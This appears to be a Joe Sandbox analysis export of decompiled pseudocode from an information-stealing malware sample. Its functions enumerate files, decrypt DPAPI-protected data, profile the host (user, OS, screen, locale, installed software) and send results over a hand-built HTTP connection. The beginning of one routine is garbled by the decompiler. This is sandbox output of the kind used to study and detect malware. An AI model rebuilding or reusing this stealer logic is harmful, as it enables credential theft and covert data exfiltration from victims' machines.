				 *_t1 = _t112;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t145);
				_push(0x4117df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t146;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x411808);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x411808);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t110, 0x104) != 0) {
						_push(_t145);
						_push(0x411753);
						_push( *[fs:eax]);
						 *[fs:eax] = _t146;
						_push(_v8);
						_push(0x411808);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(0x411808);
						E0040813C(0x1f,  &_v652);
						_push(_v652);
						E00403E1C();
						E00410900(_v644, _t110,  &_v640, _t142, _t143);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x411808);
						_push(_v12);
						_push(E00411810);
						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
						_push(_v664);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v656, _v660);
						_pop(_t107);
						E0040DCE8(_t107, _t110, _v656, _t142, _t143);
						_pop(_t141);
						 *[fs:eax] = _t141;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(E004117E6);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}


























                                                                                                    0x00411590
                                                                                                    0x00411590
                                                                                                    0x00411590
                                                                                                    0x00411591
                                                                                                    0x00411593
                                                                                                    0x00411594
                                                                                                    0x00411599
                                                                                                    0x00411599
                                                                                                    0x0041159b
                                                                                                    0x0041159d
                                                                                                    0x0041159d
                                                                                                    0x004115a0
                                                                                                    0x004115a0
                                                                                                    0x004115a3
                                                                                                    0x004115a4
                                                                                                    0x004115a5
                                                                                                    0x004115a6
                                                                                                    0x004115a9
                                                                                                    0x004115ac
                                                                                                    0x004115b2
                                                                                                    0x004115ba
                                                                                                    0x004115c2
                                                                                                    0x004115c9
                                                                                                    0x004115ca
                                                                                                    0x004115cf
                                                                                                    0x004115d2
                                                                                                    0x004115ea
                                                                                                    0x00411600
                                                                                                    0x00411603
                                                                                                    0x00411603
                                                                                                    0x00411606
                                                                                                    0x0041161c
                                                                                                    0x00411621
                                                                                                    0x00411627
                                                                                                    0x00411637
                                                                                                    0x0041163c
                                                                                                    0x0041164d
                                                                                                    0x0041165f
                                                                                                    0x00411667
                                                                                                    0x00411668
                                                                                                    0x0041166d
                                                                                                    0x00411670
                                                                                                    0x00411673
                                                                                                    0x00411676
                                                                                                    0x0041168c
                                                                                                    0x00411691
                                                                                                    0x00411697
                                                                                                    0x004116a7
                                                                                                    0x004116ac
                                                                                                    0x004116bd
                                                                                                    0x004116ce
                                                                                                    0x004116df
                                                                                                    0x004116ea
                                                                                                    0x004116eb
                                                                                                    0x004116ee
                                                                                                    0x004116f3
                                                                                                    0x004116f6
                                                                                                    0x0041170c
                                                                                                    0x00411711
                                                                                                    0x00411717
                                                                                                    0x00411727
                                                                                                    0x00411738
                                                                                                    0x00411743
                                                                                                    0x00411744
                                                                                                    0x0041174b
                                                                                                    0x0041174e
                                                                                                    0x0041174e
                                                                                                    0x0041176d
                                                                                                    0x00411779
                                                                                                    0x00411780
                                                                                                    0x00411783
                                                                                                    0x00411786
                                                                                                    0x00411796
                                                                                                    0x004117a1
                                                                                                    0x004117b1
                                                                                                    0x004117bc
                                                                                                    0x004117cc
                                                                                                    0x004117de

                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                                                    • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstFreeNextString
                                                                                                    • String ID: .txt$\*.*
                                                                                                    • API String ID: 2008072091-2615687548
                                                                                                    • Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                                                    • Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
                                                                                                    • Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                                                    • Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004094C4 Relevance: 3.0, APIs: 2, Instructions: 33encryptionCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 16%
                                                                                                    			E004094C4(intOrPtr __eax, void* __ecx, char __edx) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v36;
				intOrPtr _v40;

				_t19 = __ecx;
				_v20 = __edx;
				_v16 = __eax;
				_push( &_v12);
				_push(1);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v20);
				if( *0x41c7c8() == 0) {
					return E00403538(__ecx, E0040952C);
				}
				E004036DC(__ecx, _v36);
				E00403AC0(_t19, _v40);
				return LocalFree(_v36);
			}








                                                                                                    0x004094c8
                                                                                                    0x004094ca
                                                                                                    0x004094cd
                                                                                                    0x004094d5
                                                                                                    0x004094d6
                                                                                                    0x004094d8
                                                                                                    0x004094da
                                                                                                    0x004094dc
                                                                                                    0x004094de
                                                                                                    0x004094e4
                                                                                                    0x004094ed
                                                                                                    0x00000000
                                                                                                    0x00409518
                                                                                                    0x004094f5
                                                                                                    0x00409500
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
                                                                                                    • LocalFree.KERNEL32(?), ref: 0040950A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CryptDataFreeLocalUnprotect
                                                                                                    • String ID:
                                                                                                    • API String ID: 1561624719-0
                                                                                                    • Opcode ID: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                                                                                                    • Instruction ID: 8d19d854ff734d332b2dbdc515c77238868d08609e2067f50d6fa790567ddd23
                                                                                                    • Opcode Fuzzy Hash: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                                                                                                    • Instruction Fuzzy Hash: 85F0B4B17043007BD7009E5ACC81B4BB7D8AB84710F10893EB558DB2D2D774D8054B5A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404B4C Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 51%
                                                                                                    			E00404B4C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x404bb2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00403748( &_v20, 7,  &_v15);
				E00402988(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00404BB9);
				return E004034E4( &_v20);
			}








                                                                                                    0x00404b55
                                                                                                    0x00404b5a
                                                                                                    0x00404b5b
                                                                                                    0x00404b60
                                                                                                    0x00404b63
                                                                                                    0x00404b72
                                                                                                    0x00404b82
                                                                                                    0x00404b8d
                                                                                                    0x00404b98
                                                                                                    0x00404b98
                                                                                                    0x00404b9e
                                                                                                    0x00404ba1
                                                                                                    0x00404ba4
                                                                                                    0x00404bb1

                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                                                                                                    • Instruction ID: e83552b6022aae669f2d5c27f359814ee46eaea323ddb5c136f95371eef2deca
                                                                                                    • Opcode Fuzzy Hash: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                                                                                                    • Instruction Fuzzy Hash: 0FF0A470A04209AFEB15DE91CC41A9EF7BAF7C4714F40847AA610762C1E7B86A048698
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A4A4 Relevance: 1.5, APIs: 1, Instructions: 16comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 21%
                                                                                                    			E0040A4A4(void* __eax, void* __edx) {
				void* _t5;

				_t5 = __eax;
				_push(E00404900(__edx));
				_push(E0040A4CC);
				_push(5);
				_push(0);
				_push(_t5);
				L0040A41C();
				return E0040A49C();
			}




                                                                                                    0x0040a4a8
                                                                                                    0x0040a4b1
                                                                                                    0x0040a4b2
                                                                                                    0x0040a4b7
                                                                                                    0x0040a4b9
                                                                                                    0x0040a4bb
                                                                                                    0x0040a4bc
                                                                                                    0x0040a4c8

                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(0041B0DC,00000000,00000005,0040A4CC,00000000), ref: 0040A4BC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateInstance
                                                                                                    • String ID:
                                                                                                    • API String ID: 542301482-0
                                                                                                    • Opcode ID: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
                                                                                                    • Instruction ID: ecfa08d63a5e99a02bf1f10941cb6c6ba3816feefb3116676bc77a3be9f2b9a2
                                                                                                    • Opcode Fuzzy Hash: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
                                                                                                    • Instruction Fuzzy Hash: E5C002953917243AE551B2AA2CCAF5B418C4B88B59F214177B618F61D2A5E85C2001AE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407A34 Relevance: .0, Instructions: 2COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00407A34() {

				return  *[fs:0x30];
			}



                                                                                                    0x00407a3b

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                    • Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00418124 Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 269libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 65%
                                                                                                    			E00418124(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v432;
				intOrPtr _v444;
				short _v446;
				char _v448;
				char _v1472;
				char _v1476;
				char _v1480;
				char _v1484;
				char _v1488;
				char _v1492;
				void* _t144;
				void* _t151;
				void* _t186;
				struct HINSTANCE__* _t196;
				void* _t197;
				intOrPtr _t206;
				void* _t222;
				void* _t225;
				void* _t228;

				_v1476 = 0;
				_v1480 = 0;
				_v1484 = 0;
				_v1488 = 0;
				_v1492 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				E00403980(_a16);
				E00403980(_a12);
				_push(_t228);
				_push(0x418535);
				_push( *[fs:eax]);
				 *[fs:eax] = _t228 + 0xfffffa30;
				E0040357C( &_v28, "wsock32.dll");
				_t196 = GetModuleHandleA(E004039E8( &_v28));
				if(_t196 == 0) {
					_t196 = LoadLibraryA(E004039E8( &_v28));
				}
				 *0x41c89c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0xc]));
				 *0x41c8a0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x17]));
				 *0x41c8a4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x25]));
				 *0x41c8a8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x2c]));
				 *0x41c8ac = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x31]));
				 *0x41c8b0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x36]));
				 *0x41c8b4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x3c]));
				 *0x41c8b8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x44]));
				if(_t196 != 0 &&  *0x41c89c != 0 &&  *0x41c8a0 != 0 &&  *0x41c8a4 != 0 &&  *0x41c8a8 != 0 &&  *0x41c8ac != 0 &&  *0x41c8b0 != 0 &&  *0x41c8b4 != 0 &&  *0x41c8b8 != 0) {
					E004034E4( &_v24);
					_push( &_v432);
					_push(E00404EE4(2, 2));
					if( *0x41c89c() == 0) {
						_t225 =  *0x41c8a4(2, 1, 0);
						if(_t225 != 0xffffffff) {
							_v448 = 2;
							_t144 =  *0x41c8a0(E00403990(_v8));
							if(_t144 != 0) {
								_v444 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))));
								_v446 =  *0x41c8b0(_a8);
								_t151 =  *0x41c8b4(_t225,  &_v448, 0x10);
								_t243 = _t151;
								if(_t151 == 0) {
									E00403850();
									E00403D2C( &_v1480, _v1484);
									E00417D60(E00403790(_a12), _t196,  &_v1488, _t225, _t243);
									E00403D2C( &_v1492, _a12);
									E00403E1C();
									E0040377C( &_v20, _v1476);
									 *0x41c8a8(_t225, E004039E8( &_v20), E00403790(_v20), 0, _v1492, L"\r\n\r\n", _v1488, _v1480, "Content-Length: ", 0x4185d8, "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", "User-agent: ", "Connection: close\r\n", 0x4185d8, _a16, "Host: ", " HTTP/1.0\r\n", _v12, 0x4185a8, _v16);
									E004034E4( &_v24);
									do {
										E004034E4( &_v32);
										E004028E0( &_v1472, 0x400);
										_t197 =  *0x41c8ac(_t225,  &_v1472, 0x400, 0);
										E004035D4( &_v32, _t197,  &_v1472);
										E00403798( &_v24, _v32);
									} while (_t197 > 0);
									 *0x41c8b8(_t225);
									_push( &_v24);
									_push(E00403A78(0x418680, _v24) + 4);
									_t186 = E00403790(_v24);
									_pop(_t222);
									E004039F0(_v24, _t186, _t222);
									E00403538(_a4, _v24);
								}
							}
						}
					}
				}
				_pop(_t206);
				 *[fs:eax] = _t206;
				_push(E0041853C);
				E00403B98( &_v1492, 2);
				E004034E4( &_v1484);
				E00403B98( &_v1480, 2);
				E00403508( &_v32, 7);
				return E00403508( &_a12, 2);
			}





























                                                                                                    0x00418131
                                                                                                    0x00418137
                                                                                                    0x0041813d
                                                                                                    0x00418143
                                                                                                    0x00418149
                                                                                                    0x0041814f
                                                                                                    0x00418152
                                                                                                    0x00418155
                                                                                                    0x00418158
                                                                                                    0x0041815b
                                                                                                    0x0041815e
                                                                                                    0x00418161
                                                                                                    0x00418167
                                                                                                    0x0041816f
                                                                                                    0x00418177
                                                                                                    0x0041817f
                                                                                                    0x00418187
                                                                                                    0x0041818e
                                                                                                    0x0041818f
                                                                                                    0x00418194
                                                                                                    0x00418197
                                                                                                    0x004181a2
                                                                                                    0x004181b5
                                                                                                    0x004181b9
                                                                                                    0x004181c9
                                                                                                    0x004181c9
                                                                                                    0x004181dd
                                                                                                    0x004181f4
                                                                                                    0x0041820b
                                                                                                    0x00418222
                                                                                                    0x00418239
                                                                                                    0x00418250
                                                                                                    0x00418267
                                                                                                    0x0041827e
                                                                                                    0x00418285
                                                                                                    0x004182f6
                                                                                                    0x00418301
                                                                                                    0x0041830b
                                                                                                    0x00418314
                                                                                                    0x00418326
                                                                                                    0x0041832b
                                                                                                    0x00418331
                                                                                                    0x00418343
                                                                                                    0x0041834b
                                                                                                    0x00418358
                                                                                                    0x00418369
                                                                                                    0x0041837a
                                                                                                    0x00418380
                                                                                                    0x00418382
                                                                                                    0x004183c9
                                                                                                    0x004183da
                                                                                                    0x004183f3
                                                                                                    0x0041840c
                                                                                                    0x00418422
                                                                                                    0x00418430
                                                                                                    0x0041844a
                                                                                                    0x00418453
                                                                                                    0x00418458
                                                                                                    0x0041845b
                                                                                                    0x0041846d
                                                                                                    0x00418487
                                                                                                    0x00418494
                                                                                                    0x0041849f
                                                                                                    0x004184a4
                                                                                                    0x004184a9
                                                                                                    0x004184b2
                                                                                                    0x004184c3
                                                                                                    0x004184c7
                                                                                                    0x004184d1
                                                                                                    0x004184d2
                                                                                                    0x004184dd
                                                                                                    0x004184dd
                                                                                                    0x00418382
                                                                                                    0x0041834b
                                                                                                    0x0041832b
                                                                                                    0x00418314
                                                                                                    0x004184e4
                                                                                                    0x004184e7
                                                                                                    0x004184ea
                                                                                                    0x004184fa
                                                                                                    0x00418505
                                                                                                    0x00418515
                                                                                                    0x00418522
                                                                                                    0x00418534

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 004181C4
                                                                                                    • GetProcAddress.KERNEL32(00000000,-0000000C,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?), ref: 004181D8
                                                                                                    • GetProcAddress.KERNEL32(00000000,-00000017,00000000,-0000000C,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?), ref: 004181EF
                                                                                                    • GetProcAddress.KERNEL32(00000000,-00000025,00000000,-00000017,00000000,-0000000C,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?), ref: 00418206
                                                                                                    • GetProcAddress.KERNEL32(00000000,-0000002C,00000000,-00000025,00000000,-00000017,00000000,-0000000C,00000000,00000000,00418535,?,00000000,00000000,?,00418B28), ref: 0041821D
                                                                                                    • GetProcAddress.KERNEL32(00000000,-00000031,00000000,-0000002C,00000000,-00000025,00000000,-00000017,00000000,-0000000C,00000000,00000000,00418535,?,00000000,00000000), ref: 00418234
                                                                                                    • GetProcAddress.KERNEL32(00000000,-00000036,00000000,-00000031,00000000,-0000002C,00000000,-00000025,00000000,-00000017,00000000,-0000000C,00000000,00000000,00418535), ref: 0041824B
                                                                                                    • GetProcAddress.KERNEL32(00000000,-0000003C,00000000,-00000036,00000000,-00000031,00000000,-0000002C,00000000,-00000025,00000000,-00000017,00000000,-0000000C,00000000,00000000), ref: 00418262
                                                                                                    • GetProcAddress.KERNEL32(00000000,-00000044,00000000,-0000003C,00000000,-00000036,00000000,-00000031,00000000,-0000002C,00000000,-00000025,00000000,-00000017,00000000,-0000000C), ref: 00418279
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                    • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
                                                                                                    • API String ID: 384173800-3355491746
                                                                                                    • Opcode ID: 447bc90b094ad6630a41df1a26737c259296e5cff920802da588b0ecfe34b4d8
                                                                                                    • Instruction ID: acd65350bdfe250b2cabb462dd412f1b2f53023e341749034ab9d15be0839763
                                                                                                    • Opcode Fuzzy Hash: 447bc90b094ad6630a41df1a26737c259296e5cff920802da588b0ecfe34b4d8
                                                                                                    • Instruction Fuzzy Hash: 85B1DFB1940219AFDB11EF65CC86BDF7BB8EF44306F50407BF504B2291DB789A458E58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00417278 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 213sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 44%
                                                                                                    			E00417278(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				signed char _t59;
				intOrPtr* _t60;
				intOrPtr* _t142;
				void* _t143;
				intOrPtr _t173;
				void* _t181;
				intOrPtr _t184;
				intOrPtr _t185;

				_t182 = __esi;
				_t59 = __eax +  *__eax;
				 *_t59 =  *_t59 + _t59;
				asm("das");
				 *_t59 =  *_t59 + _t59;
				 *__edx =  *__edx + _t59;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 & _t59;
				 *_t59 =  *_t59 + _t59;
				_t60 = _t59 +  *_t59;
				 *_t60 =  *_t60 + _t60;
				 *_t60 =  *_t60 + _t60;
				_t184 = _t185;
				_t143 = 0xc;
				do {
					_push(0);
					_push(0);
					_t143 = _t143 - 1;
					_t191 = _t143;
				} while (_t143 != 0);
				_t142 = _t60;
				_push(_t184);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				_push("MachineID :   ");
				E00406C4C( &_v8, _t142, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t142);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t142, _t181, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t191);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t142);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v40);
				E004037DC( &_v68, "Screen: ",  *_t142);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t142,  &_v72, __esi, _t191);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t142,  &_v76, _t182, _t191);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v60);
				_push( *_t142);
				_push("Layouts: ");
				E00416FB8( &_v80, _t142, _t181, _t182);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("LocalTime: ");
				E00417198( &_v84, _t142, _t182);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("Zone: ");
				E00417098( &_v88, _t142, _t181, _t182, _t191);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t142);
				E00416748( &_v92, _t142, _t181, _t182);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t142);
				E00416B94( &_v96, _t142, _t181, _t182, _t191);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t142);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t142, _t181, _t182);
				E00403798(_t142, _v100);
				_t173 = 0x4175a8;
				 *[fs:eax] = _t173;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}



































                                                                                                    0x00417278
                                                                                                    0x00417278
                                                                                                    0x0041727a
                                                                                                    0x0041727c
                                                                                                    0x0041727d
                                                                                                    0x0041727f
                                                                                                    0x00417281
                                                                                                    0x00417283
                                                                                                    0x00417284
                                                                                                    0x00417286
                                                                                                    0x00417288
                                                                                                    0x0041728a
                                                                                                    0x0041728e
                                                                                                    0x00417291
                                                                                                    0x00417293
                                                                                                    0x00417298
                                                                                                    0x00417298
                                                                                                    0x0041729a
                                                                                                    0x0041729c
                                                                                                    0x0041729c
                                                                                                    0x0041729c
                                                                                                    0x004172a0
                                                                                                    0x004172a4
                                                                                                    0x004172a5
                                                                                                    0x004172aa
                                                                                                    0x004172ad
                                                                                                    0x004172b0
                                                                                                    0x004172b8
                                                                                                    0x004172bd
                                                                                                    0x004172c0
                                                                                                    0x004172cc
                                                                                                    0x004172d1
                                                                                                    0x004172d3
                                                                                                    0x004172dd
                                                                                                    0x004172e2
                                                                                                    0x004172e5
                                                                                                    0x004172f1
                                                                                                    0x004172f6
                                                                                                    0x004172f8
                                                                                                    0x00417300
                                                                                                    0x00417305
                                                                                                    0x00417308
                                                                                                    0x00417315
                                                                                                    0x00417320
                                                                                                    0x00417325
                                                                                                    0x0041732b
                                                                                                    0x00417330
                                                                                                    0x00417333
                                                                                                    0x0041733b
                                                                                                    0x00417340
                                                                                                    0x00417343
                                                                                                    0x00417350
                                                                                                    0x0041735a
                                                                                                    0x00417369
                                                                                                    0x00417374
                                                                                                    0x00417379
                                                                                                    0x0041737f
                                                                                                    0x00417384
                                                                                                    0x00417387
                                                                                                    0x0041738f
                                                                                                    0x00417394
                                                                                                    0x00417397
                                                                                                    0x0041739c
                                                                                                    0x004173a9
                                                                                                    0x004173b3
                                                                                                    0x004173c2
                                                                                                    0x004173cd
                                                                                                    0x004173d2
                                                                                                    0x004173df
                                                                                                    0x004173e4
                                                                                                    0x004173e7
                                                                                                    0x004173f6
                                                                                                    0x004173fb
                                                                                                    0x004173fe
                                                                                                    0x0041740b
                                                                                                    0x00417415
                                                                                                    0x0041741a
                                                                                                    0x0041741c
                                                                                                    0x00417424
                                                                                                    0x00417429
                                                                                                    0x0041742c
                                                                                                    0x00417438
                                                                                                    0x0041743d
                                                                                                    0x0041743f
                                                                                                    0x00417447
                                                                                                    0x0041744c
                                                                                                    0x0041744f
                                                                                                    0x0041745b
                                                                                                    0x00417460
                                                                                                    0x00417462
                                                                                                    0x0041746a
                                                                                                    0x0041746f
                                                                                                    0x00417472
                                                                                                    0x0041747e
                                                                                                    0x00417483
                                                                                                    0x00417488
